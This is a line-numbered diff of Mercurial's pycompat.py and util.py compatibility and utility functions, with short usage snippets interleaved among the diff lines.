255 safehasattr = _wrapattrfunc(builtins.hasattr)
252 safehasattr = _wrapattrfunc(builtins.hasattr)
256
253
257 def _getoptbwrapper(orig, args, shortlist, namelist):
254 def _getoptbwrapper(orig, args, shortlist, namelist):
258 """
255 """
259 Takes bytes arguments, converts them to unicode, passes them to
256 Takes bytes arguments, converts them to unicode, passes them to
260 getopt.getopt(), converts the returned values back to bytes, and then
257 getopt.getopt(), converts the returned values back to bytes, and then
261 returns them, for Python 3 compatibility, as getopt.getopt() doesn't
258 returns them, for Python 3 compatibility, as getopt.getopt() doesn't
262 accept bytes on Python 3.
259 accept bytes on Python 3.
263 """
260 """
264 args = [a.decode('latin-1') for a in args]
261 args = [a.decode('latin-1') for a in args]
265 shortlist = shortlist.decode('latin-1')
262 shortlist = shortlist.decode('latin-1')
266 namelist = [a.decode('latin-1') for a in namelist]
263 namelist = [a.decode('latin-1') for a in namelist]
267 opts, args = orig(args, shortlist, namelist)
264 opts, args = orig(args, shortlist, namelist)
268 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
265 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
269 for a in opts]
266 for a in opts]
270 args = [a.encode('latin-1') for a in args]
267 args = [a.encode('latin-1') for a in args]
271 return opts, args
268 return opts, args
272
269
273 def strkwargs(dic):
270 def strkwargs(dic):
274 """
271 """
275 Converts the keys of a Python dictionary to str (i.e. unicode) so that
272 Converts the keys of a Python dictionary to str (i.e. unicode) so that
276 they can be passed as keyword arguments, since dictionaries with bytes
273 they can be passed as keyword arguments, since dictionaries with bytes
277 keys can't be passed as keyword arguments to functions on Python 3.
274 keys can't be passed as keyword arguments to functions on Python 3.
278 """
275 """
279 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
276 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
280 return dic
277 return dic
281
278
282 def byteskwargs(dic):
279 def byteskwargs(dic):
283 """
280 """
284 Converts the keys of a Python dictionary back to bytes after they were
281 Converts the keys of a Python dictionary back to bytes after they were
285 converted to str to pass that dictionary as keyword arguments on Python 3.
282 converted to str to pass that dictionary as keyword arguments on Python 3.
286 """
283 """
287 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
284 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
288 return dic
285 return dic
289
286
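A hypothetical call site showing the intended round trip (function and key names are illustrative): bytes keys are converted to str just for the ** boundary, then converted back inside the callee. (On Python 3 the dic.iteritems() calls above work because Mercurial's module loader rewrites iteritems() to items() at import time.)

def logcmd(**opts):
    opts = byteskwargs(opts)     # keys are bytes again inside the command
    return opts[b'rev']

opts = {b'rev': b'tip'}
logcmd(**strkwargs(opts))        # str keys cross the ** boundary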
290 # TODO: handle shlex.shlex().
287 # TODO: handle shlex.shlex().
291 def shlexsplit(s, comments=False, posix=True):
288 def shlexsplit(s, comments=False, posix=True):
292 """
289 """
293 Takes a bytes argument, converts it to str (i.e. unicode), passes it to
290 Takes a bytes argument, converts it to str (i.e. unicode), passes it to
294 shlex.split(), converts the returned values back to bytes, and returns
291 shlex.split(), converts the returned values back to bytes, and returns
295 them, for Python 3 compatibility, as shlex.split() doesn't accept bytes.
292 them, for Python 3 compatibility, as shlex.split() doesn't accept bytes.
296 """
293 """
297 ret = shlex.split(s.decode('latin-1'), comments, posix)
294 ret = shlex.split(s.decode('latin-1'), comments, posix)
298 return [a.encode('latin-1') for a in ret]
295 return [a.encode('latin-1') for a in ret]
299
296
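For example (a sketch; the quoting rules are plain shlex):

assert shlexsplit(b"hg log -r 'tip^'") == [b'hg', b'log', b'-r', b'tip^']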
300 def emailparser(*args, **kwargs):
297 def emailparser(*args, **kwargs):
301 import email.parser
298 import email.parser
302 return email.parser.BytesParser(*args, **kwargs)
299 return email.parser.BytesParser(*args, **kwargs)
303
300
304 else:
301 else:
305 import cStringIO
302 import cStringIO
306
303
307 bytechr = chr
304 bytechr = chr
308 byterepr = repr
305 byterepr = repr
309 bytestr = str
306 bytestr = str
310 iterbytestr = iter
307 iterbytestr = iter
311 maybebytestr = identity
308 maybebytestr = identity
312 sysbytes = identity
309 sysbytes = identity
313 sysstr = identity
310 sysstr = identity
314 strurl = identity
311 strurl = identity
315 bytesurl = identity
312 bytesurl = identity
316
313
317 # this can't be parsed on Python 3
314 # this can't be parsed on Python 3
318 exec('def raisewithtb(exc, tb):\n'
315 exec('def raisewithtb(exc, tb):\n'
319 ' raise exc, None, tb\n')
316 ' raise exc, None, tb\n')
320
317
321 def fsencode(filename):
318 def fsencode(filename):
322 """
319 """
323 Partial backport from os.py in Python 3, which only accepts bytes.
320 Partial backport from os.py in Python 3, which only accepts bytes.
324 In Python 2, our paths should only ever be bytes; a unicode path
321 In Python 2, our paths should only ever be bytes; a unicode path
325 indicates a bug.
322 indicates a bug.
326 """
323 """
327 if isinstance(filename, str):
324 if isinstance(filename, str):
328 return filename
325 return filename
329 else:
326 else:
330 raise TypeError(
327 raise TypeError(
331 "expect str, not %s" % type(filename).__name__)
328 "expect str, not %s" % type(filename).__name__)
332
329
333 # In Python 2, fsdecode() is very likely to receive bytes, so it's
330 # In Python 2, fsdecode() is very likely to receive bytes, so it's
334 # better not to touch the Python 2 part as it's already working fine.
331 # better not to touch the Python 2 part as it's already working fine.
335 fsdecode = identity
332 fsdecode = identity
336
333
337 def getdoc(obj):
334 def getdoc(obj):
338 return getattr(obj, '__doc__', None)
335 return getattr(obj, '__doc__', None)
339
336
340 _notset = object()
337 _notset = object()
341
338
342 def safehasattr(thing, attr):
339 def safehasattr(thing, attr):
343 return getattr(thing, attr, _notset) is not _notset
340 return getattr(thing, attr, _notset) is not _notset
344
341
345 def _getoptbwrapper(orig, args, shortlist, namelist):
342 def _getoptbwrapper(orig, args, shortlist, namelist):
346 return orig(args, shortlist, namelist)
343 return orig(args, shortlist, namelist)
347
344
348 strkwargs = identity
345 strkwargs = identity
349 byteskwargs = identity
346 byteskwargs = identity
350
347
351 oscurdir = os.curdir
348 oscurdir = os.curdir
352 oslinesep = os.linesep
349 oslinesep = os.linesep
353 osname = os.name
350 osname = os.name
354 ospathsep = os.pathsep
351 ospathsep = os.pathsep
355 ospardir = os.pardir
352 ospardir = os.pardir
356 ossep = os.sep
353 ossep = os.sep
357 osaltsep = os.altsep
354 osaltsep = os.altsep
358 stdin = sys.stdin
355 stdin = sys.stdin
359 stdout = sys.stdout
356 stdout = sys.stdout
360 stderr = sys.stderr
357 stderr = sys.stderr
361 if getattr(sys, 'argv', None) is not None:
358 if getattr(sys, 'argv', None) is not None:
362 sysargv = sys.argv
359 sysargv = sys.argv
363 sysplatform = sys.platform
360 sysplatform = sys.platform
364 getcwd = os.getcwd
361 getcwd = os.getcwd
365 sysexecutable = sys.executable
362 sysexecutable = sys.executable
366 shlexsplit = shlex.split
363 shlexsplit = shlex.split
367 bytesio = cStringIO.StringIO
364 bytesio = cStringIO.StringIO
368 stringio = bytesio
365 stringio = bytesio
369 maplist = map
366 maplist = map
370 rangelist = range
367 rangelist = range
371 ziplist = zip
368 ziplist = zip
372 rawinput = raw_input
369 rawinput = raw_input
373 getargspec = inspect.getargspec
370 getargspec = inspect.getargspec
374
371
375 def emailparser(*args, **kwargs):
372 def emailparser(*args, **kwargs):
376 import email.parser
373 import email.parser
377 return email.parser.Parser(*args, **kwargs)
374 return email.parser.Parser(*args, **kwargs)
378
375
379 isjython = sysplatform.startswith('java')
376 isjython = sysplatform.startswith('java')
380
377
381 isdarwin = sysplatform == 'darwin'
378 isdarwin = sysplatform == 'darwin'
382 isposix = osname == 'posix'
379 isposix = osname == 'posix'
383 iswindows = osname == 'nt'
380 iswindows = osname == 'nt'
384
381
385 def getoptb(args, shortlist, namelist):
382 def getoptb(args, shortlist, namelist):
386 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
383 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
387
384
388 def gnugetoptb(args, shortlist, namelist):
385 def gnugetoptb(args, shortlist, namelist):
389 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
386 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
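A minimal, hypothetical invocation: getoptb() mirrors getopt.getopt() but takes and returns bytes on both Python versions.

opts, args = getoptb([b'-q', b'--rev', b'tip', b'file.txt'], b'q', [b'rev='])
# opts == [(b'-q', b''), (b'--rev', b'tip')], args == [b'file.txt']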
@@ -1,3876 +1,3874 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import tempfile
34 import tempfile
35 import time
35 import time
36 import traceback
36 import traceback
37 import warnings
37 import warnings
38 import zlib
38 import zlib
39
39
40 from . import (
40 from . import (
41 encoding,
41 encoding,
42 error,
42 error,
43 i18n,
43 i18n,
44 node as nodemod,
44 node as nodemod,
45 policy,
45 policy,
46 pycompat,
46 pycompat,
47 urllibcompat,
47 urllibcompat,
48 )
48 )
49 from .utils import (
49 from .utils import (
50 dateutil,
50 dateutil,
51 procutil,
51 procutil,
52 stringutil,
52 stringutil,
53 )
53 )
54
54
55 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
56 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
57 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
58
58
59 b85decode = base85.b85decode
59 b85decode = base85.b85decode
60 b85encode = base85.b85encode
60 b85encode = base85.b85encode
61
61
62 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
64 httplib = pycompat.httplib
63 httplib = pycompat.httplib
65 pickle = pycompat.pickle
64 pickle = pycompat.pickle
66 queue = pycompat.queue
67 safehasattr = pycompat.safehasattr
65 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
66 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
67 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
68 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
69 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
70 xmlrpclib = pycompat.xmlrpclib
73
71
74 httpserver = urllibcompat.httpserver
72 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
73 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
74 urlreq = urllibcompat.urlreq
77
75
78 # workaround for win32mbcs
76 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
80
78
81 if pycompat.iswindows:
79 if pycompat.iswindows:
82 from . import windows as platform
80 from . import windows as platform
83 else:
81 else:
84 from . import posix as platform
82 from . import posix as platform
85
83
86 _ = i18n._
84 _ = i18n._
87
85
88 bindunixsocket = platform.bindunixsocket
86 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
87 cachestat = platform.cachestat
90 checkexec = platform.checkexec
88 checkexec = platform.checkexec
91 checklink = platform.checklink
89 checklink = platform.checklink
92 copymode = platform.copymode
90 copymode = platform.copymode
93 expandglobs = platform.expandglobs
91 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
92 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
93 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
94 groupmembers = platform.groupmembers
97 groupname = platform.groupname
95 groupname = platform.groupname
98 isexec = platform.isexec
96 isexec = platform.isexec
99 isowner = platform.isowner
97 isowner = platform.isowner
100 listdir = osutil.listdir
98 listdir = osutil.listdir
101 localpath = platform.localpath
99 localpath = platform.localpath
102 lookupreg = platform.lookupreg
100 lookupreg = platform.lookupreg
103 makedir = platform.makedir
101 makedir = platform.makedir
104 nlinks = platform.nlinks
102 nlinks = platform.nlinks
105 normpath = platform.normpath
103 normpath = platform.normpath
106 normcase = platform.normcase
104 normcase = platform.normcase
107 normcasespec = platform.normcasespec
105 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
106 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
107 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
108 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
109 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
110 pconvert = platform.pconvert
113 poll = platform.poll
111 poll = platform.poll
114 posixfile = platform.posixfile
112 posixfile = platform.posixfile
115 rename = platform.rename
113 rename = platform.rename
116 removedirs = platform.removedirs
114 removedirs = platform.removedirs
117 samedevice = platform.samedevice
115 samedevice = platform.samedevice
118 samefile = platform.samefile
116 samefile = platform.samefile
119 samestat = platform.samestat
117 samestat = platform.samestat
120 setflags = platform.setflags
118 setflags = platform.setflags
121 split = platform.split
119 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
120 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
121 statisexec = platform.statisexec
124 statislink = platform.statislink
122 statislink = platform.statislink
125 umask = platform.umask
123 umask = platform.umask
126 unlink = platform.unlink
124 unlink = platform.unlink
127 username = platform.username
125 username = platform.username
128
126
129 try:
127 try:
130 recvfds = osutil.recvfds
128 recvfds = osutil.recvfds
131 except AttributeError:
129 except AttributeError:
132 pass
130 pass
133
131
134 # Python compatibility
132 # Python compatibility
135
133
136 _notset = object()
134 _notset = object()
137
135
138 def _rapply(f, xs):
136 def _rapply(f, xs):
139 if xs is None:
137 if xs is None:
140 # assume None means non-value of optional data
138 # assume None means non-value of optional data
141 return xs
139 return xs
142 if isinstance(xs, (list, set, tuple)):
140 if isinstance(xs, (list, set, tuple)):
143 return type(xs)(_rapply(f, x) for x in xs)
141 return type(xs)(_rapply(f, x) for x in xs)
144 if isinstance(xs, dict):
142 if isinstance(xs, dict):
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
143 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 return f(xs)
144 return f(xs)
147
145
148 def rapply(f, xs):
146 def rapply(f, xs):
149 """Apply function recursively to every item preserving the data structure
147 """Apply function recursively to every item preserving the data structure
150
148
151 >>> def f(x):
149 >>> def f(x):
152 ... return 'f(%s)' % x
150 ... return 'f(%s)' % x
153 >>> rapply(f, None) is None
151 >>> rapply(f, None) is None
154 True
152 True
155 >>> rapply(f, 'a')
153 >>> rapply(f, 'a')
156 'f(a)'
154 'f(a)'
157 >>> rapply(f, {'a'}) == {'f(a)'}
155 >>> rapply(f, {'a'}) == {'f(a)'}
158 True
156 True
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
157 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
158 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161
159
162 >>> xs = [object()]
160 >>> xs = [object()]
163 >>> rapply(pycompat.identity, xs) is xs
161 >>> rapply(pycompat.identity, xs) is xs
164 True
162 True
165 """
163 """
166 if f is pycompat.identity:
164 if f is pycompat.identity:
167 # fast path mainly for py2
165 # fast path mainly for py2
168 return xs
166 return xs
169 return _rapply(f, xs)
167 return _rapply(f, xs)
170
168
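One common shape of call (names illustrative): normalizing every leaf of a nested structure without disturbing its shape, e.g. with pycompat.bytestr.

data = {b'user': b'alice', b'files': [b'a.txt', b'b.txt']}
data = rapply(pycompat.bytestr, data)   # same nesting, every key and leaf converted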
171 def bitsfrom(container):
169 def bitsfrom(container):
172 bits = 0
170 bits = 0
173 for bit in container:
171 for bit in container:
174 bits |= bit
172 bits |= bit
175 return bits
173 return bits
176
174
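This is simply an OR over the container's members, e.g.:

mode = bitsfrom([stat.S_IRUSR, stat.S_IWUSR])
assert mode == stat.S_IRUSR | stat.S_IWUSR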
177 # Python 2.6 still has deprecation warnings enabled by default. We do not want
175 # Python 2.6 still has deprecation warnings enabled by default. We do not want
178 # to display anything to ordinary users, so detect whether we are running tests
176 # to display anything to ordinary users, so detect whether we are running tests
179 # and only use Python deprecation warnings in that case.
177 # and only use Python deprecation warnings in that case.
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
178 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 if _dowarn:
179 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
180 # explicitly unfilter our warning for python 2.7
183 #
181 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
182 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
183 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
184 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS approach useless for our use case.
185 # makes the whole PYTHONWARNINGS approach useless for our use case.
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
187 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 if _dowarn and pycompat.ispy3:
189 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
190 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
191 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 r'mercurial')
192 r'mercurial')
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
193 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 DeprecationWarning, r'mercurial')
194 DeprecationWarning, r'mercurial')
197 # TODO: reinvent imp.is_frozen()
195 # TODO: reinvent imp.is_frozen()
198 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
196 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
199 DeprecationWarning, r'mercurial')
197 DeprecationWarning, r'mercurial')
200
198
201 def nouideprecwarn(msg, version, stacklevel=1):
199 def nouideprecwarn(msg, version, stacklevel=1):
202 """Issue an python native deprecation warning
200 """Issue an python native deprecation warning
203
201
204 This is a no-op outside of tests; use 'ui.deprecwarn' when possible.
202 This is a no-op outside of tests; use 'ui.deprecwarn' when possible.
205 """
203 """
206 if _dowarn:
204 if _dowarn:
207 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
208 " update your code.)") % version
206 " update your code.)") % version
209 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
210
208
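A hypothetical call site: with HGEMITWARNINGS unset this does nothing; otherwise it emits a DeprecationWarning attributed to the caller's caller via stacklevel=2.

def oldapi():
    nouideprecwarn(b'use newapi() instead of oldapi()', b'4.6', stacklevel=2)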
211 DIGESTS = {
209 DIGESTS = {
212 'md5': hashlib.md5,
210 'md5': hashlib.md5,
213 'sha1': hashlib.sha1,
211 'sha1': hashlib.sha1,
214 'sha512': hashlib.sha512,
212 'sha512': hashlib.sha512,
215 }
213 }
216 # List of digest types from strongest to weakest
214 # List of digest types from strongest to weakest
217 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
218
216
219 for k in DIGESTS_BY_STRENGTH:
217 for k in DIGESTS_BY_STRENGTH:
220 assert k in DIGESTS
218 assert k in DIGESTS
221
219
222 class digester(object):
220 class digester(object):
223 """helper to compute digests.
221 """helper to compute digests.
224
222
225 This helper can be used to compute one or more digests given their name.
223 This helper can be used to compute one or more digests given their name.
226
224
227 >>> d = digester([b'md5', b'sha1'])
225 >>> d = digester([b'md5', b'sha1'])
228 >>> d.update(b'foo')
226 >>> d.update(b'foo')
229 >>> [k for k in sorted(d)]
227 >>> [k for k in sorted(d)]
230 ['md5', 'sha1']
228 ['md5', 'sha1']
231 >>> d[b'md5']
229 >>> d[b'md5']
232 'acbd18db4cc2f85cedef654fccc4a4d8'
230 'acbd18db4cc2f85cedef654fccc4a4d8'
233 >>> d[b'sha1']
231 >>> d[b'sha1']
234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
235 >>> digester.preferred([b'md5', b'sha1'])
233 >>> digester.preferred([b'md5', b'sha1'])
236 'sha1'
234 'sha1'
237 """
235 """
238
236
239 def __init__(self, digests, s=''):
237 def __init__(self, digests, s=''):
240 self._hashes = {}
238 self._hashes = {}
241 for k in digests:
239 for k in digests:
242 if k not in DIGESTS:
240 if k not in DIGESTS:
243 raise error.Abort(_('unknown digest type: %s') % k)
241 raise error.Abort(_('unknown digest type: %s') % k)
244 self._hashes[k] = DIGESTS[k]()
242 self._hashes[k] = DIGESTS[k]()
245 if s:
243 if s:
246 self.update(s)
244 self.update(s)
247
245
248 def update(self, data):
246 def update(self, data):
249 for h in self._hashes.values():
247 for h in self._hashes.values():
250 h.update(data)
248 h.update(data)
251
249
252 def __getitem__(self, key):
250 def __getitem__(self, key):
253 if key not in DIGESTS:
251 if key not in DIGESTS:
254 raise error.Abort(_('unknown digest type: %s') % key)
252 raise error.Abort(_('unknown digest type: %s') % key)
255 return nodemod.hex(self._hashes[key].digest())
253 return nodemod.hex(self._hashes[key].digest())
256
254
257 def __iter__(self):
255 def __iter__(self):
258 return iter(self._hashes)
256 return iter(self._hashes)
259
257
260 @staticmethod
258 @staticmethod
261 def preferred(supported):
259 def preferred(supported):
262 """returns the strongest digest type in both supported and DIGESTS."""
260 """returns the strongest digest type in both supported and DIGESTS."""
263
261
264 for k in DIGESTS_BY_STRENGTH:
262 for k in DIGESTS_BY_STRENGTH:
265 if k in supported:
263 if k in supported:
266 return k
264 return k
267 return None
265 return None
268
266
269 class digestchecker(object):
267 class digestchecker(object):
270 """file handle wrapper that additionally checks content against a given
268 """file handle wrapper that additionally checks content against a given
271 size and digests.
269 size and digests.
272
270
273 d = digestchecker(fh, size, {'md5': '...'})
271 d = digestchecker(fh, size, {'md5': '...'})
274
272
275 When multiple digests are given, all of them are validated.
273 When multiple digests are given, all of them are validated.
276 """
274 """
277
275
278 def __init__(self, fh, size, digests):
276 def __init__(self, fh, size, digests):
279 self._fh = fh
277 self._fh = fh
280 self._size = size
278 self._size = size
281 self._got = 0
279 self._got = 0
282 self._digests = dict(digests)
280 self._digests = dict(digests)
283 self._digester = digester(self._digests.keys())
281 self._digester = digester(self._digests.keys())
284
282
285 def read(self, length=-1):
283 def read(self, length=-1):
286 content = self._fh.read(length)
284 content = self._fh.read(length)
287 self._digester.update(content)
285 self._digester.update(content)
288 self._got += len(content)
286 self._got += len(content)
289 return content
287 return content
290
288
291 def validate(self):
289 def validate(self):
292 if self._size != self._got:
290 if self._size != self._got:
293 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 raise error.Abort(_('size mismatch: expected %d, got %d') %
294 (self._size, self._got))
292 (self._size, self._got))
295 for k, v in self._digests.items():
293 for k, v in self._digests.items():
296 if v != self._digester[k]:
294 if v != self._digester[k]:
297 # i18n: first parameter is a digest name
295 # i18n: first parameter is a digest name
298 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 raise error.Abort(_('%s mismatch: expected %s, got %s') %
299 (k, v, self._digester[k]))
297 (k, v, self._digester[k]))
300
298
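A sketch of the intended flow (path and values illustrative; real callers take the size and digests from transfer metadata):

fh = open('bundle.hg', 'rb')
size, digests = 1024, {'sha1': '...'}    # from the transfer metadata
check = digestchecker(fh, size, digests)
while check.read(_chunksize):
    pass
check.validate()    # raises error.Abort on a size or digest mismatch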
301 try:
299 try:
302 buffer = buffer
300 buffer = buffer
303 except NameError:
301 except NameError:
304 def buffer(sliceable, offset=0, length=None):
302 def buffer(sliceable, offset=0, length=None):
305 if length is not None:
303 if length is not None:
306 return memoryview(sliceable)[offset:offset + length]
304 return memoryview(sliceable)[offset:offset + length]
307 return memoryview(sliceable)[offset:]
305 return memoryview(sliceable)[offset:]
308
306
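On both Python 2 (the builtin buffer) and Python 3 (the memoryview fallback above), this slices without copying:

data = b'0123456789'
view = buffer(data, 2, 4)       # bytes 2..5, no copy
assert bytes(view) == b'2345'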
309 _chunksize = 4096
307 _chunksize = 4096
310
308
311 class bufferedinputpipe(object):
309 class bufferedinputpipe(object):
312 """a manually buffered input pipe
310 """a manually buffered input pipe
313
311
314 Python will not let us use buffered IO and lazy reading with 'polling' at
312 Python will not let us use buffered IO and lazy reading with 'polling' at
315 the same time. We cannot probe the buffer state and select will not detect
313 the same time. We cannot probe the buffer state and select will not detect
316 that data are ready to read if they are already buffered.
314 that data are ready to read if they are already buffered.
317
315
318 This class lets us work around that by implementing its own buffering
316 This class lets us work around that by implementing its own buffering
319 (allowing efficient readline) while offering a way to know if the buffer is
317 (allowing efficient readline) while offering a way to know if the buffer is
320 empty from the output (allowing collaboration of the buffer with polling).
318 empty from the output (allowing collaboration of the buffer with polling).
321
319
322 This class lives in the 'util' module because it makes use of the 'os'
320 This class lives in the 'util' module because it makes use of the 'os'
323 module from the python stdlib.
321 module from the python stdlib.
324 """
322 """
325 def __new__(cls, fh):
323 def __new__(cls, fh):
326 # If we receive a fileobjectproxy, we need to use a variation of this
324 # If we receive a fileobjectproxy, we need to use a variation of this
327 # class that notifies observers about activity.
325 # class that notifies observers about activity.
328 if isinstance(fh, fileobjectproxy):
326 if isinstance(fh, fileobjectproxy):
329 cls = observedbufferedinputpipe
327 cls = observedbufferedinputpipe
330
328
331 return super(bufferedinputpipe, cls).__new__(cls)
329 return super(bufferedinputpipe, cls).__new__(cls)
332
330
333 def __init__(self, input):
331 def __init__(self, input):
334 self._input = input
332 self._input = input
335 self._buffer = []
333 self._buffer = []
336 self._eof = False
334 self._eof = False
337 self._lenbuf = 0
335 self._lenbuf = 0
338
336
339 @property
337 @property
340 def hasbuffer(self):
338 def hasbuffer(self):
341 """True is any data is currently buffered
339 """True is any data is currently buffered
342
340
343 This will be used externally as a pre-step for polling IO. If there is
341 This will be used externally as a pre-step for polling IO. If there is
344 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
345 return bool(self._buffer)
343 return bool(self._buffer)
346
344
347 @property
345 @property
348 def closed(self):
346 def closed(self):
349 return self._input.closed
347 return self._input.closed
350
348
351 def fileno(self):
349 def fileno(self):
352 return self._input.fileno()
350 return self._input.fileno()
353
351
354 def close(self):
352 def close(self):
355 return self._input.close()
353 return self._input.close()
356
354
357 def read(self, size):
355 def read(self, size):
358 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
359 self._fillbuffer()
357 self._fillbuffer()
360 return self._frombuffer(size)
358 return self._frombuffer(size)
361
359
362 def readline(self, *args, **kwargs):
360 def readline(self, *args, **kwargs):
363 if 1 < len(self._buffer):
361 if 1 < len(self._buffer):
364 # this should not happen because both read and readline end with a
362 # this should not happen because both read and readline end with a
365 # _frombuffer call that collapses it.
363 # _frombuffer call that collapses it.
366 self._buffer = [''.join(self._buffer)]
364 self._buffer = [''.join(self._buffer)]
367 self._lenbuf = len(self._buffer[0])
365 self._lenbuf = len(self._buffer[0])
368 lfi = -1
366 lfi = -1
369 if self._buffer:
367 if self._buffer:
370 lfi = self._buffer[-1].find('\n')
368 lfi = self._buffer[-1].find('\n')
371 while (not self._eof) and lfi < 0:
369 while (not self._eof) and lfi < 0:
372 self._fillbuffer()
370 self._fillbuffer()
373 if self._buffer:
371 if self._buffer:
374 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
375 size = lfi + 1
373 size = lfi + 1
376 if lfi < 0: # end of file
374 if lfi < 0: # end of file
377 size = self._lenbuf
375 size = self._lenbuf
378 elif 1 < len(self._buffer):
376 elif 1 < len(self._buffer):
379 # we need to take previous chunks into account
377 # we need to take previous chunks into account
380 size += self._lenbuf - len(self._buffer[-1])
378 size += self._lenbuf - len(self._buffer[-1])
381 return self._frombuffer(size)
379 return self._frombuffer(size)
382
380
383 def _frombuffer(self, size):
381 def _frombuffer(self, size):
384 """return at most 'size' data from the buffer
382 """return at most 'size' data from the buffer
385
383
